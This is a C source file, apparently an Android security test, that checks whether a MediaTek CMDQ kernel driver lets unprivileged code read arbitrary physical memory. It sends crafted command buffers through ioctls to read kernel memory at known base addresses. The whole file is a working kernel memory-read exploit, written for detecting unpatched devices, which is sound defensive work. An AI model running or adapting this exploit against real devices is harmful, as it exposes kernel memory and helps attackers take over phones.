/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#include "../includes/common.h"

static char *device_names[] = {"/dev/mtk_cmdq", "/proc/mtk_cmdq",
                               "/dev/mtk_mdp"};

#define CMDQ_IOCTL_ALLOC_WRITE_ADDRESS 0x40087807
#define CMDQ_IOCTL_FREE_WRITE_ADDRESS 0x40087808
// This is "most" of the IOCTL code, though the size field is left out as it
// will be ORed in later when the specific value for this device has been
// identified.
#define CMDQ_IOCTL_EXEC_COMMAND 0x40007803

struct cmdqWriteAddressStruct {
  uint32_t count;
  uint32_t address;
};

struct cmdqReadRegStruct {
  uint32_t count;
  uint64_t addresses;
};

struct cmdqRegValueStruct {
  uint32_t count;
  uint64_t values;
};

struct cmdqReadAddressStruct {
  uint32_t count;
  uint64_t addresses;
  uint64_t values;
};

struct cmdqCommandStruct {
  uint32_t value1;
  uint32_t value2;
  uint64_t value3;
  uint64_t buffer;
  uint32_t buffer_size;
  struct cmdqReadRegStruct reg_request;
  struct cmdqRegValueStruct reg_value;
  struct cmdqReadAddressStruct read_address;
  uint8_t padding[0x2f0 - 0x58];
};

typedef enum {
  OperationSuccess,
  OperationFailed,
  OperationError,
} OperationResult;

#define SET_VALUE(x)                                                           \
  instructions[command.buffer_size / 8] = (x);                                 \
  command.buffer_size += 8;

// This function identifies what the IOCTL command code should be
// for EXEC_COMMAND, given that it varies depending on the structure size.
OperationResult work_out_ioctl_code(int fd, int *ioctl_code) {
  uint64_t instructions[0x100];
  struct cmdqCommandStruct command;

  memset(instructions, 0, sizeof(instructions));
  memset(&command, 0, sizeof(command));

  command.buffer = (uint64_t)&instructions;

  // CMDQ_CODE_WFE
  SET_VALUE(0x2000000080010000);
  // CMDQ_CODE_EOC
  SET_VALUE(0x4000000000000001);
  // CMDQ_CODE_JUMP - argA is 0 and argB is 8, this is ok.
  SET_VALUE(0x1000000000000008);

  for (int ii = 0xa8; ii <= 0x2f0; ii += 8) {
    int ioctl_result =
        ioctl(fd, CMDQ_IOCTL_EXEC_COMMAND | (ii << 16), &command);

    if ((-1 != ioctl_result) || (errno != ENOTTY)) {
      *ioctl_code = CMDQ_IOCTL_EXEC_COMMAND | (ii << 16);
      return OperationSuccess;
    }
  }

  // Unable to identify the particular IOCTL code for this device.
  return OperationError;
}

OperationResult perform_pa_read(int fd, int ioctl_code, uint32_t kernel_buffer,
                                uint64_t address, unsigned char *buffer,
                                size_t size) {
  OperationResult result = OperationError;
  uint64_t *instructions = NULL;
  uint32_t *addresses = NULL;
  struct cmdqCommandStruct command;
  size_t num_words = size / 4;

  if (size % 4) {
    goto exit;
  }

  // Each command is 8 bytes, we require 5 commands for every 32 bits we try to
  // read, plus another 4 for prologue/epilogue.
  instructions = malloc((num_words * 5 + 4) * sizeof(uint64_t));
  if (!instructions) {
    goto exit;
  }
  // Another buffer to tell the driver where to read back from.
  addresses = malloc(sizeof(uint32_t) * num_words);
  if (!addresses) {
    goto exit;
  }
  memset(&command, 0, sizeof(command));
  command.buffer = (uint64_t)instructions;
  command.read_address.count = size;
  command.read_address.addresses = (uint64_t)addresses;
  command.read_address.values = (uint64_t)buffer;

  // CMDQ_CODE_WFE
  SET_VALUE(0x2000000080010000);

  for (size_t ii = 0; ii < num_words; ii++) {
    addresses[ii] = kernel_buffer + (sizeof(uint32_t) * ii);

    // CMDQ_CODE_MOVE - put DMA address into register
    SET_VALUE(0x0297000000000000 | addresses[ii]);
    // CMDQ_CODE_WRITE - write PA into DMA address
    SET_VALUE(0x0497000000000000 | (address + sizeof(uint32_t) * ii));
    // CMDQ_CODE_READ - read PA into register from DMA address
    SET_VALUE(0x01d7000000000005);
    // CMDQ_CODE_READ - read from PA into register
    SET_VALUE(0x01c5000000000005);
    // CMDQ_CODE_WRITE - write value into DMA address
    SET_VALUE(0x04d7000000000005);
  }

  // CMDQ_CODE_WFE
  SET_VALUE(0x2000000080010000);
  // CMDQ_CODE_EOC
  SET_VALUE(0x4000000000000001);
  // CMDQ_CODE_JUMP - argA is 0 and argB is 8, this is ok.
  SET_VALUE(0x1000000000000008);

  switch (ioctl(fd, ioctl_code, &command)) {
  case -1:
    if (errno == EFAULT) {
      // Command buffer rejected, the driver is patched.
      result = OperationFailed;
    }
    // Something is wrong with the command buffer.  This may be a device
    // type that has not been encountered during testing.
    break;
  case 0:
    // Driver accepted the command buffer and did something with it.
    result = OperationSuccess;
    break;
  }

exit:
  if (addresses) {
    free(addresses);
  }
  if (instructions) {
    free(instructions);
  }
  return result;
}

int main() {
  int exit_code = EXIT_FAILURE;
  int fd = -1;
  unsigned char buffer[0x1000];
  size_t read_size = 0x100;
  struct cmdqWriteAddressStruct kernel_buffer = {read_size, 0};
  int ioctl_code = 0;
  bool command_accepted = false;
  // Mediatek have given these as possible kernel base addresses for different
  // devices.
  unsigned long kernel_bases[] = {0x40008000, 0x40080000, 0x80008000};
  unsigned long pa_length = 0x10000;

  for (size_t ii = 0; ii < sizeof(device_names) / sizeof(device_names[0]);
       ii++) {
    fd = open(device_names[ii], O_RDONLY);
    if (-1 == fd) {
      // If we can't access the driver, then it's not vulnerable.
      if (errno == EACCES) {
        exit_code = EXIT_SUCCESS;
        goto exit;
      }
    } else {
      break;
    }
  }
  if (-1 == fd) {
    goto exit;
  }

  if (-1 == ioctl(fd, CMDQ_IOCTL_ALLOC_WRITE_ADDRESS, &kernel_buffer)) {
    goto exit;
  }

  if (OperationSuccess != work_out_ioctl_code(fd, &ioctl_code)) {
    goto exit;
  }

  for (size_t ii = 0; ii < sizeof(kernel_bases) / sizeof(kernel_bases[0]);
       ii++) {
    for (unsigned long pa = kernel_bases[ii]; pa < kernel_bases[ii] + pa_length;
         pa += 0x1000) {
      memset(buffer, 0, read_size);

      switch (perform_pa_read(fd, ioctl_code, kernel_buffer.address, pa, buffer,
                              read_size)) {
      case OperationSuccess:
        command_accepted = true;
        for (size_t ii = 0; ii < read_size; ii++) {
          if (buffer[ii] != 0) {
            exit_code = EXIT_VULNERABLE;
            goto exit;
          }
        }
        break;
      case OperationFailed:
        exit_code = EXIT_SUCCESS;
        break;
      case OperationError:
        break;
      }
    }
  }

  // If the driver accepted commands, but we didn't manage to read any data,
  // then we failed to demonstrate a vulnerability.
  if (command_accepted) {
    exit_code = EXIT_SUCCESS;
  }

exit:
  if (-1 != fd) {
    if (kernel_buffer.address != 0) {
      (void)ioctl(fd, CMDQ_IOCTL_FREE_WRITE_ADDRESS, &kernel_buffer);
    }
    (void)close(fd);
  }

  return exit_code;
}
